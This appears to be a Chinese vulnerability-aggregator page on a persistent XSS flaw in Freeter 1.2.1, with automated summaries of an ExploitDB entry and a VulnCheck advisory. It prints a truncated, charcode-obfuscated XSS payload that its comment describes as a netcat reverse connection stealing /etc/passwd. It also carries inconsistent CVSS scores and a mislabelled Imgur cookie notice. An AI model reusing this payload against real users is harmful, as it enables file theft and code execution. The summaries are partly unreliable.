# Freeter 1.2.1 持久性XSS漏洞
N/A
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: Freeter 1.2.1 - Persistent Cross-Site Scripting - Multiple webapps Exploit -- 🔗来源链接
标签:exploit
神龙速读:
### 关键信息
- **漏洞标题**: Freeter 1.2.1 - Persistent Cross-Site Scripting
- **EID-ID**: 49833
- **漏洞作者**: TaurusOmar
- **漏洞类型**: WEBAPPS
- **平台**: MULTIPLE
- **日期**: 2021-05-05
- **CVE编号**: N/A
- **CVSS评分**: 8.8 (高风险)
- **厂商主页**: https://freeter.io/
- **版本**: 1.2.1
- **测试平台**: Windows, Linux, MacOS
### 攻击载荷示例
```markdown
# Payload 2: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,101,114,114,99,61,120,32,111,116
```
### 描述
This is an XSS exploit against Freeter 1.2.1, allowing an attacker to execute arbitrary JavaScript code on the target's browser, potentially leading to unauthorized actions such as stealing sensitive information or controlling the user's session.
标题: - GIF - Imgur -- 🔗来源链接
标签:exploit
神龙速读:
- Page: Imgur
- Date: May 5, 2021
- Views: 218
### Key Vulnerability Information
- **Personal Data Usage**
- Personalised advertising and content
- Advertising and content measurement
- Audience research and services development
- Store and/or access information on a device
- **Data Processing**
- Personal data will be processed and information from your device (cookies, unique identifiers, and other device data) may be stored, accessed, and shared.
- Involved parties: 168 TCF vendors and 80 ad partners.
- **Options**
- Users can manage or withdraw consent in privacy and cookie settings.
标题: The Organizer for Those Who Do — Freeter -- 🔗来源链接
标签:product
神龙速读:
从这个网页截图中未直接显示任何关于漏洞的关键信息。该网页主要介绍了Freeter应用程序的功能和特点,包括其工作流管理、项目组织、窗口小部件、隐私保护等。如果需要查找漏洞信息,请提供更具体的上下文或检查相关的安全公告和漏洞报告。
标题: Freeter 1.2.1 - Persistent Cross-Site Scripting | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:
## 关键漏洞信息
- **漏洞名称**: Freeter 1.2.1 - Persistent Cross-Site Scripting
- **严重程度**: Medium
- **日期**: January 16, 2026
- **影响版本**: Freeter 1.2.1
- **CVE参考号**: CVE-2021-47835
- **CVE描述**: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- **CVSS评分**: 4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
- **相关链接**:
- [ExploitDB-49833](#)
- [Official Freeter Product Homepage](#)
- [Proof of Concept Video](#)
- **发现者**: TaurusOmar
- **漏洞描述**:
Freeter 1.2.1 存在持久性跨站脚本漏洞,允许攻击者在自定义小部件标题和文件中存储恶意payload。攻击者可以创建带有嵌入脚本的恶意文件,当受害者与应用程序交互时,脚本会执行,潜在地启用远程代码执行。
暂无评论